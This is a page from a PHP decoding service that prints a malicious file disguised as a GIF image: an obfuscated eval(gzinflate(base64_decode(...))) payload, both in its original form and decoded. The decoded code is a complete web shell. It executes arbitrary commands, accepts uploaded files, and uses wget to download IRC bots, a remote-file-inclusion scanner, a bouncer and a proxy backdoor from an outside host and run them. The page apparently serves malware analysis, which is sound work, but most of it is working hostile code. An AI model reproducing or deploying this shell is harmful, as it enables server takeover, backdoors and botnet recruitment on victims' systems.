Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIF89a???????????!??????,???????D?;? <?php eval(gzinflate(base64_decode('1Vl7Uxs5Ev97qe..
Decoded Output download
?><html><head>
<style type="text/css">
<!--
body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }
table { width:100%; }
table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }
a { color:lightblue;text-decoration:none; }
a:active { color:#00FF00; }
a:link { color:#5B5BFF; }
a:hover { text-decoration:underline; }
a:visited { color:#99CCFF; }
input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }
textarea { color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2; }
input[type="submit"] { border:1px solid #000000; }
input[type="text"] { padding:3px;}
input,select,option,input[type="submit"]:hover { background-color:#333333; }
textarea { background-color:#000000; }
// -->
</style>
<title>-LampungCyber Community-</title>
</head>
<body><center><hr noshade size=1><h2>diKi Simple Shell Injectionz v0.01</h2><p>
<hr noshade size=1>
Thanks to : arch_fajri - lampungcarding - chandra35 - singkong @ irc.bandarlampung.us</center></p>
<hr noshade size=1>
<?php
error_reporting(4);
$sh_mainurl = "http://www.bandarlampung.us/irc/";
$sh_sourcez = array(
"dQ99Sh" => array($sh_mainurl."readme.txt","kiddie.php"),
"dQBNC" => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
"Eggdrop" => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
"BindDoor" => array($sh_mainurl."proxy.tgz","proxy.tgz"),
"RFIScaN" => array($sh_mainurl."404.txt","error.txt"),
);
if (safemode()) { $dsafe = "<font color=#3366FF><b>ON</b></font>"; }
else { $dsafe = "<font color=#3366FF><b>OFF</b></font>"; }
echo "Safe : $dsafe OS: ".info(php_uname())."<br>".
"Software : ".info(getenv("SERVER_SOFTWARE"))."<br>".
"Userid : ".info(aJ99exec("id"))."<br>".
"IP Target: ".info(gethostbyname($_SERVER["HTTP_HOST"]))."<br>".
"IP Anda : ".info($_SERVER["REMOTE_ADDR"])."<br>";
if (isset($_POST['dir'])) {
$dir = $_POST['dir'];
if (!@chdir($dir)) { echo "Ga bisa masuk $dir | "; }
}
else { $dir = getcwd(); }
echo "Direktory: $dir ";
if (is_writable($dir)) { echo "[Writable]"; } else { echo "[Readonly]"; }
?>
<hr noshade size=1>
<center>
<textarea cols=130 rows=20>
<?php
if (empty($_POST['portpsy'])) { $portpsy = 27071; }
if (empty($_POST['bip'])) { $bip = gethostbyname($_SERVER["HTTP_HOST"]); }
if (isset($_POST['bot1'])) {
$chan1 = $_POST['channel1'];
$sirc1 = $_POST['serverirc1'];
echo "Downloading Scanbot 1..
";
echo aJ99exec("cd /dev/shm;wget ".$sh_sourcez["RFIScaN"][0]);
echo "Loading RFI Scanbot.. $chan1 at $sirc1 $port1
";
echo aJ99exec("cd /dev/shm;perl ".$sh_sourcez["RFIScaN"][1]." $chan1 $sirc1 $port1;");
}
elseif (isset($_POST['psy'])) {
$portpsy = $_POST['portpsy'];
echo aJ99exec("wget ".$sh_sourcez["dQBNC"][0].";tar -zxf ".$sh_sourcez["dQBNC"][1]);
echo aJ99exec("cd .dQBNC;./config admin $portpsy;./fuck;./run");
}
elseif (isset($_POST['egg'])) {
$bf = $_POST['bf'];
$bnick = $_POST['bnick'];
$bident = $_POST['bident'];
$bip = $_POST['bip'];
$bchan = $_POST['bchan'];
$bowner = $_POST['bowner'];
echo aJ99exec("wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["Eggdrop"][1]);
echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);
echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');
}
elseif (isset($_POST['eggrun'])) {
$bf = $_POST['bf'];
$bnick = $_POST['bnick'];
$bident = $_POST['bident'];
$bip = $_POST['bip'];
$bchan = $_POST['bchan'];
$bowner = $_POST['bowner'];
echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);
echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');
}
elseif (isset($_POST['bind'])) {
echo aJ99exec("wget ".$sh_sourcez["BindDoor"][0].";tar -zxf ".$sh_sourcez["BindDoor"][1].";cd pro;./prox -d -a -p22222");
}
elseif (isset($_POST['cmd'])) {
$cmdtxt = $_POST['cmdtxt'];
$ret = aJ99exec($cmdtxt); echo htmlspecialchars($ret);
}
?>
</textarea>
</center>
<hr noshade size=1>
<!-- <form enctype="multipart/form-data" action="" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
UPLOAD File: <input name="file" type="file" />
<input type="submit" value="UPLOAD" />
</form> -->
<hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Direktori: <input type="text" size=40 value="<?php echo $dir; ?>" name="dir" />
Command: <input type="text" size=80 value="<?php echo $cmdtxt; ?>" name="cmdtxt" />
<input type="submit" value="Execute" name="cmd" /><br>
</form>
<!-- <hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Port: <input type="text" size=6 value="<?php echo $portpsy; ?>" name="portpsy" />
<input type="submit" value="dQBNC" name="psy" />
<input type="submit" value="Elite Proxy" name="bind" />
</form> -->
<hr noshade size=1>
<hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
<strong>Install EggDrop : </strong><p>
File: <input type="text" size=10 value="<?php echo $bf; ?>" name="bf" />
Nick: <input type="text" size=10 value="<?php echo $bnick; ?>" name="bnick" />
Ident: <input type="text" size=10 value="<?php echo $bident; ?>" name="bident" />
IP: <input type="text" size=10 value="<?php echo $bip; ?>" name="bip" />
Chan: <input type="text" size=10 value="<?php echo $bchan; ?>" name="bchan" />
Owner: <input type="text" size=10 value="<?php echo $bowner; ?>" name="bowner" />
<input type="submit" value="Install Eggdrop" name="egg" />
<input type="submit" value="Load Eggdrop" name="eggrun" />
</form>
<hr noshade size=1>
<hr noshade size=1>
<!-- <form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Chan: <input type="text" size=6 value="<?php echo $channel1; ?>" name="channel1" />
Server: <input type="text" value="<?php echo $serverirc1; ?>" name="serverirc1" />
Port: <input type="text" value="<?php echo $port1; ?>" name="port1" />
<input type="submit" value="RFIBotScaN" name="bot1" />
</form> -->
<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>
<?php
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload OK!!!</b><br><br>'; }
else { echo '<b>Upload FAILED!!!</b><br><br>'; }
}
?>
<?php
function info($txt){ return "<font color=lime>".$txt."</font>"; }
###########################
## aJ99Sh CORE FUNCTIONS ##
###########################
function safemode() {
if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
else { return FALSE; }
}
function getdisfunc() {
$disfunc = @ini_get("disable_functions");
if (!empty($disfunc)) {
$disfunc = str_replace(" ","",$disfunc);
$disfunc = explode(",",$disfunc);
}
else { $disfunc= array(); }
return $disfunc;
}
function enabled($func) {
if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
else { return FALSE; }
}
function aJ99exec($cmd) {
$output = "";
if ( enabled("popen") ) {
$h = popen($cmd.' 2>&1', 'r');
if ( is_resource($h) ) {
while ( !feof($h) ) { $output .= fread($h, 2096); }
pclose($h);
}
}
elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("
",$o); }
elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
else { $output = "NULL"; }
return $output;
}
function aJ99exec2($cmd) {
$output = "";
if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("
",$o); }
elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("popen") ) {
$h = popen($cmd.' 2>&1', 'r');
if ( is_resource($h) ) {
while ( !feof($h) ) { $output .= fread($h, 2096); }
pclose($h);
}
}
return $output;
}
die();
?><?
Did this file decode correctly?
Original Code
GIF89a???????????!??????,???????D?;?
<?php
eval(gzinflate(base64_decode('1Vl7Uxs5Ev97qeI7CIWNTZU9tsljg18JAfuWWxY4TG6vjqVc85A9CuOZKY2M4+ztd79uSfPCNo+r263NUCQz3eqf+iV1S7zvd305C+BfZnv97a1uIpcBI3IZsx6V7ItsuElCkbFTr29vOZG3rEnbgSG/kUkUyvrEnvFg2b5jwrNDu6NoCf/K2q1W/KXjRkEk2gufS9ZxbPd2KqJ56NU12QmA0iG/b2+liAvuSb/daja/z8k16QHHiYTHRBswSRIF3CMv3jXxpzOzxZSHdRnF7f30w4mkjGbwHduex8Np+w2ogoA2IOm5Az71pRPMWQeNrHvMjYQteRS2wyhkenDbdiW/Y5nMi2ZzOGw2DTPg4W3OevPxzcfh0LD8CNwBvPvQYDoTIJfi3/EEHOPlKAcHR0cGhYfxXNYSFjBX1qIY5Y3L2+9iSaTtRzPb+PfFUD3GfLB71Vtv1aO9ClrZguW+eOExz/FYJwM/iuaCgwVnbLEZKpss0/ZaZ00yd2Zc0pu1UWuqZ0UGdVISacReQcTWe6G2bq7M5StJ9uKVeu5bvjquoFmjQep1zPmGWg34JrmEl/qpPYvn4fRo6cBsR9FsNg+5XNa7Dc1HkXQh4VLpd10WSiZgeQkSRolve4zg6ui1gLTf9/hPnIz4LIbsH/ksCMhJ+BlMBTO/krum1WwB3n6/GyPgKsT21pVvh7cJkRFpE1u4/nhifxac1EmgFXVtge4EggsjPWG/egPvCZBuIyB/IFy4lgMcWxgJa550G6nWjY0TA/l97MfbW0yISIwFiyMhAbb6eq+zvbWb+OOZzcO5CEiPUF/KuN1oLBaLlbkaoECDGpEE8s5lX0HEFsJeVre3CKHePw4ORj4lhPT6hl6AtyjE05sxS0IC1egth/RhFmhG92pG/OPZ0WZpxbYgK6zpV5AvfRqEwXTqiSimmyDsIAiZzDHK3wbkIw+94ygSdANILKIvS0sqgPzdCF8OT0aufbZJ9nXztTFfBUO9oyRGApbQhFQTe8Jmkceqe3uQ+7sefmNgurjk9S7Qg4Xy9u1w2O86/fOzbsOB6CO3T9WSYEHCniQ6HK7IgrTrR4SOUBSfdopzPmoTavFwElUhZON5aM9QR4t2HdGnFhoPDx1FE7mAhUuy0VMmWXhXpaPB5T8Hl+PR+fDql8PLAV2V/ZQwARsPyWXtvx8csC/MrVLurRE4uSBXsLUxWZzMjxLpLJV6u2M96TX98erqYvzj+eiK3qyFOYRUL8ybC14Ofj6/GowPj48vQdRIdnSoeJIwCWMvAPe64nFRucGgIewufIHrS7wOMlBu54PrA6WKg1SUtc//ZhOHJzaZ2cn8ViP8h+iwFKOqgMFOd+FV93TAlfgxF+xWRmLZ1oNyLccLwVV9vj/j9S+GcYPTEDOF4V3CYo3CYHmjVXivd5J1G0y6c+Lem27bkG1Jr/WqSUS0SHr7zeI+pPVis1guM+/hnhQnS+1Bsms+wdL9H5o/tHQRWhFyeJwKwKt2y6Phz7DK4YNGpFWIH+7BrUIE8TtkQcuEcTeBzbDIh9SFqoZEM8IEJVqEQWSrjR32hRBmIS3L+jWk+aA8yV2PNDx210j8WWcBtkA6Fvba62xzublu3uwVZjk1MwA/ncWyUhtsmWqrvNp6wtwxtD6b527dWDQFLyF3KCplcnXVw1l4lQPzCK+kwDr11rlD1wt0hkU7kHak/vXLZNOgVtFjJbMtNaRjNdwonPApgRrFw0xBoE/m0PtaDTEPHzaQTacFA51JwTZnkiaOE3L3tsjB74zJPVhKRa4i5Oy4xIszBkajyMLvjAk5yIq7kSY83c9pVX3E0/mw9b6uoK91xQVvej5npGKBm6yK+h/9YF6V0el7bF7QJPOq9H/CFEkSpFN0gJO4gscyAY49lxEsEte/zVSohxGDMh2Q+puKijJ5IMyQCt96pL+xaGwKhgPNWh6KJyRz1t09ks2FcbjhocbQ7IG22PKRukfqNqnH+/g8vCu4M69YV2Ye9HzFwqIIaQQFQ15mgRkONUtZhsf/JGYutwPwv0iqON5Mris0nG5MBVYfeWFeW7d36nUCzaGYERa6+pQ2mweSx7aQDaTXPVvalNjqmNOjlMywwHo9irqrqwZ1wjN3ED509CykBItvj/58+K/x8OR0MB6d/HtAyZ0NJ/gebamjGyUNEP50cXp+eEyGPGBtYpC07ARI1KDq98b9ycxxMsXVWGac0r1vDoZrLVdGl4x52AX3ZteWGmWhp8rUUB2ODhb2Wh3yvo+yaW/GMzsLZ2mt1uvmQxjFqdBEPM/C8Wwz3Lu1cDqdioia8rh/B5COc8kKYiiD3XDm7zSh/goOv4Divdk5b9dJp/W+4BxDetw75uRqpJ4iMQi4ZOQCj4+pHG5lT07gv4KTu4kUUTjtn4SJhG2eQANwDA0AHKPwNkax1HVIaYGvBKO1NlOdSTEQzkQ75gyq0rORsJSVwJCg8U6wtD0bUBXEEqKiGMiL5+PFZbDYrHEosc/GwrpcQkOCxjvHOv1sQFXdS4iK8niGF7JC38loceieHpfFA80aQezAiwvkWYsjL3Z/3gp5OIRrt6H0oFnapA1NGz9SR821sGvw8oNpETGnasyN++WGjbJ1f5tsPR5UOEF+jKS+HUtTKZMr7XgqSqtNRwxH+0fiZYDnMR66MUu5V/i6r6BuLYoth4oLfdOk/VI/MgYIes8qRNb0tAVR09B+npz6uoNPqlm3hwKVG9LrkXQ4UZ3hdzDogxvFeLeBTdPouoIKVW6uK3IWj1GLyk2NrDA1I7/SqXSdvgYm5z/t7OyoCz4o0vhbUTcf3xVveQrDh4eAfLxWxNz+ZLc3k3moYkP0XRk2qL8R6ETnIixfNgZ8xvrQV8MIi5buGV9sfpCpOuCRT47OLwdk+Ons6Ork/GxENPMByUyz/BZV993YlpMPPORjOBJUKbLHyKd75PySMMGmvEqjkNbWjtnDIKUWXl1+GigbSHphZhjDw9PRIHVYpglgeTzBz2p+N6i+odHPZwMaXsSNU7mE7uX3hebWy8ilZ4kSEtRbvNkPbJdVKaE1SmvZ+M7KaPYFgg7egXH3hhXtSjnpHf+eMdvYm7I7ZYNZiIZ41V0FqlRV3ufJ2IV6oO8hNe/lS7LDw7G5J0dareiuDW5/itdLJ6jU79Fc4pKGtUcz32bqwu4Sw+Flj+Te9WGooioUOJXu91+2KjVSEZXUp6llgumDY3XXLyAQsvBhocKQnQmLJikz08TqkQn+TQQYNbLfPHgLHtYuxid2gyhRiGay30sBuqe9nSTSF3NtAPkQOWMov0Ji0FKedkan4AgcBh4fu7AyoYNJcDTSWOiN3YDZYRbz1RkT/CPYGJ1My1ZBMmasdMoNGAXpbHRtNyrp+DniYZX+Kn6F1alYm/RZJpLN1tmvOf+79cUlkefQ2afTU3pvRWhuZ30u7j8jGf84Y/7wMPwf0uLPT+ZvafGvS7btLY9Dsetgpe6+/y8=')));
?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | cbb153bef8a388691d97b8c209d93924 |
Eval Count | 1 |
Decode Time | 92 ms |